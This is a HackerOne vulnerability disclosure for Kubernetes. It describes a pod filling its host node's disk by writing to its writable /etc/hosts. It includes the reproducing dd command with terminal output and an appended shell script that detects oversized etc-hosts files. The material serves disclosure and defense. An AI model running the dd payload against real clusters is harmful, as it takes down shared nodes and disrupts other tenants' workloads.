hackerone | Kebe | H1:867699
History: May 07, 2020 - 7:11 a.m.

Kubernetes: Node disk DOS by writing to container /etc/hosts

2020-05-07 07:11:29
kebe
hackerone.com

CVSS3: 5.5 Medium

  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVSS2: 2.1 Low

  Access Vector: LOCAL
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: PARTIAL
  Vector: AV:L/AC:L/Au:N/C:N/I:N/A:P

EPSS: 0.0004 Low

  Percentile: 10.3%

Report Submission Form

Summary:

The pod files /etc/hosts, /etc/hostname and /etc/resolv.conf are not read-only.
A normal pod running in a Kubernetes cluster can kill a host by writing data to /etc/hosts.
This applies not only to /etc/hosts but also to /etc/resolv.conf and /etc/hostname.

Kubernetes Version:

<=1.18

Component Version:

Docker 19.03

Steps To Reproduce:

  1. Use kubectl to create a pod, for example with kubectl run.
  2. Run kubectl exec -it $POD_NAME -- dd if=/dev/zero of=/etc/hosts count=1000000 bs=10M
  3. Run df -h /var/lib/kubelet on the host where the pod is running; the available disk space decreases until the disk is full.

Supporting Material/References:

[root@kebe-sm-315 ~]# kubectl exec -it rate-c848c5c8b-5b8vm sh
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl kubectl exec [POD] -- [COMMAND] instead.
Defaulting container name to rate.
Use 'kubectl describe pod/rate-c848c5c8b-5b8vm -n default' to see all of the containers in this pod.
/ # df -h
Filesystem                Size      Used Available Use% Mounted on
/dev/mapper/docker-8:16-67108930-710dfe5c781bd17e11968371b9d0f84641a2efde95c68a47eddf9ae518e768d1
                         10.0G     40.3M     10.0G   0% /
tmpfs                    64.0M         0     64.0M   0% /dev
tmpfs                     9.7G         0      9.7G   0% /sys/fs/cgroup
/dev/mapper/centos-root
                         53.0G     28.6G     24.4G  54% /dev/termination-log
/dev/sdb                100.0G     40.9G     59.1G  41% /etc/resolv.conf
/dev/sdb                100.0G     40.9G     59.1G  41% /etc/hostname
/dev/mapper/centos-root
                         53.0G     28.6G     24.4G  54% /etc/hosts
shm                      64.0M      8.0K     64.0M   0% /dev/shm
tmpfs                     9.7G     12.0K      9.7G   0% /var/run/secrets/kubernetes.io/serviceaccount
tmpfs                     9.7G         0      9.7G   0% /proc/acpi
tmpfs                    64.0M         0     64.0M   0% /proc/kcore
tmpfs                    64.0M         0     64.0M   0% /proc/keys
tmpfs                    64.0M         0     64.0M   0% /proc/timer_list
tmpfs                    64.0M         0     64.0M   0% /proc/timer_stats
tmpfs                    64.0M         0     64.0M   0% /proc/sched_debug
tmpfs                     9.7G         0      9.7G   0% /proc/scsi
tmpfs                     9.7G         0      9.7G   0% /sys/firmware

[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# ls -al
ๆ€ป็”จ้‡ 12
drwxr-xr-x  5 root root   71 5ๆœˆ   7 12:29 .
drwxr-x--- 50 root root 4096 5ๆœˆ   7 12:29 ..
drwxr-x---  5 root root   55 5ๆœˆ   7 12:31 containers
-rw-r--r--  1 root root  270 5ๆœˆ   7 12:31 etc-hosts
drwxr-x---  3 root root   37 5ๆœˆ   7 12:29 plugins
drwxr-xr-x  4 root root   65 5ๆœˆ   7 12:29 volumes
[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# kubectl exec -it rate-c848c5c8b-5b8vm -- dd if=/dev/zero of=/etc/hosts count=100 bs=1M
Defaulting container name to rate.
Use 'kubectl describe pod/rate-c848c5c8b-5b8vm -n default' to see all of the containers in this pod.
100+0 records in
100+0 records out
[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# ls -al
ๆ€ป็”จ้‡ 102408
drwxr-xr-x  5 root root        71 5ๆœˆ   7 12:29 .
drwxr-x--- 50 root root      4096 5ๆœˆ   7 12:29 ..
drwxr-x---  5 root root        55 5ๆœˆ   7 12:31 containers
-rw-r--r--  1 root root 104857600 5ๆœˆ   7 15:06 etc-hosts
drwxr-x---  3 root root        37 5ๆœˆ   7 12:29 plugins
drwxr-xr-x  4 root root        65 5ๆœˆ   7 12:29 volumes

Impact

If someone creates a pod on a public cloud running Kubernetes, the provider's host may panic because the disk is full.
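
A node-side check for the condition shown in the directory listing above, where a pod's etc-hosts file grew from 270 bytes to 100 MB. This is an added example, not part of the original report or of Kubernetes; it assumes the kubelet root directory is /var/lib/kubelet with per-pod files at pods/<pod-uid>/etc-hosts, and the function names and the 1 MiB default limit are illustrative.

```shell
#!/bin/sh
# Added example: flag kubelet-managed etc-hosts files that have grown past a limit.
# Assumption: per-pod files live at <root>/pods/<pod-uid>/etc-hosts, matching the
# pod directory listing in the report (containers, etc-hosts, plugins, volumes).
#
# Usage on a node: oversized_etc_hosts /var/lib/kubelet 1048576

# oversized_etc_hosts ROOT LIMIT_BYTES
# Prints "<pod-uid> <size-bytes> <path>" for each offending file, largest first.
oversized_etc_hosts() {
    root=${1:-/var/lib/kubelet}
    limit=${2:-1048576}   # 1 MiB; a normal etc-hosts is a few hundred bytes
    # A missing pods directory means nothing to report, not an error.
    [ -d "$root/pods" ] || return 0
    # -size +Nc matches files strictly larger than N bytes.
    find "$root/pods" -mindepth 2 -maxdepth 2 -type f -name etc-hosts \
        -size +"${limit}c" 2>/dev/null |
    while IFS= read -r f; do
        uid=$(basename "$(dirname "$f")")
        size=$(wc -c < "$f" | tr -d ' ')
        printf '%s %s %s\n' "$uid" "$size" "$f"
    done | sort -k2,2nr
}

# count_oversized ROOT LIMIT_BYTES
# Prints the number of pods whose etc-hosts exceeds the limit (for alerting).
count_oversized() {
    oversized_etc_hosts "$1" "$2" | wc -l | tr -d ' '
}
```

The first column is the pod UID, which corresponds to metadata.uid of the pod object, so an offending file can be traced back to the workload that wrote it.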
